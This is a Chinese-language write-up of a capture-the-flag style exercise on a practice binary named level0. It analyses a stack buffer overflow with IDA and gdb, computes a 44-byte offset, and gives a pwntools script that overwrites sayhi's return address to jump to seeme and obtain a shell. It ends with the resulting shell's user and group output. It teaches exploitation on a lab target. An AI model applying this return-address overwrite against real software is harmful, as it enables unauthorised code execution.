根据ida可以看到有如下几个函数

image.png

main,sayhi,myRead,seeme，其中前三个是逐渐调用，我们要做的是在main函数为入口的程序中将seeme函数调用。

在linux下可以运行一下程序，随便输入，显示正常，

image.png

然后多输入一堆a,可以看到会有溢出。

image.png

进入gdb进行调试，可以发现输入是在myRead函数中进行的，我们可以看到输入的地址为0xffffd3c0，

image.png

image.png

在这个函数中可以看到字符串输入的地址比当前函数的ebp还大，所以这个函数的ebp下面的ret地址无法改变，只能改变上一层的函数即sayhi函数ebp下面的ret，也就是sayhi函数执行完后，返回main的地址可以被改变。
在sayhi函数中可以看到ebp的地址为0xffffd3e8，

image.png

所以0xffffd3e8-0xffffd3c0=0x28。也就是说我们需要输入40个字节才可以到达ebp（ebp的地址没有被覆盖）,再增加4个字节就可以覆盖ebp，然后可以跟上我们要调用的函数的地址，即seeme函数的地址，0x080485B3,这样就可以做到返回的时候进入seeme函数，就拿到了shell。
python脚本，注意需要是python2，如果是python3的时候，再payload那里会出错，无法将字符串和字节拼在一起

from pwn import *

conn=process('./level0')

seeme=0x080485B3
conn.recv()

payload = 'a'*44+p32(seeme)

conn.sendline(payload)
conn.recv()

conn.interactive()

image.png

shell：uid=1000(securitylab) gid=1000(securitylab) groups=1000(securitylab),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)